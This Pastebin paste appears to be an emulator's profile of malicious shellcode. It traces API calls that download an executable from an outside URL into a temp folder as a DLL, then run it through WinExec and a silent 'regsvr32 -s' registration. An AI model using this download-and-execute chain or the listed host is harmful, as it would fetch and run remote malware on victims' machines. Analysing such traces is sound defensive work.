Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [Shellcode Profile]
- BOOL VirtualProtectEx (
- HANDLE = 0x03d8f2e0 =>
- none;
- LPCVOID = 0x03d8f3a0 =>
- none;
- DWORD dwSize = 255;
- DWORD flNewProtect = 64;
- PDWORD lpflOldProtectt = 64;
- ) = 0x1;
- HMODULE LoadLibraryA (
- LPCTSTR = 0x03d8f730 =>
- = "urlmon";
- ) = 0x7df20000;
- DWORD GetTempPathA (
- DWORD nBufferLength = 248;
- LPTSTR = 0x03d8f9e0 =>
- = "c:\tmp\";
- ) = 0x7;
- HRESULT URLDownloadToFile (
- LPUNKNOWN = 0x03d8fcb0 =>
- none;
- LPCTSTR = 0x03d8fd70 =>
- = "http://frequent.dwyane-wade.org/news/opinion-toss9.exe";
- LPCTSTR = 0x03d8feb0 =>
- = "c:\tmp\wpbt0.dll";
- DWORD dwReserved = 0;
- LPBINDSTATUSCALLBACK lpfnCB = 0;
- ) = 0x0;
- UINT WINAPI WinExec (
- LPCSTR = 0x03d90180 =>
- = "c:\tmp\wpbt0.dll";
- UINT uCmdShow = 0;
- ) = 0x20;
- UINT WINAPI WinExec (
- LPCSTR = 0x03d90440 =>
- = "regsvr32 -s c:\tmp\wpbt0.dll";
- UINT uCmdShow = 0;
- ) = 0x20;
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement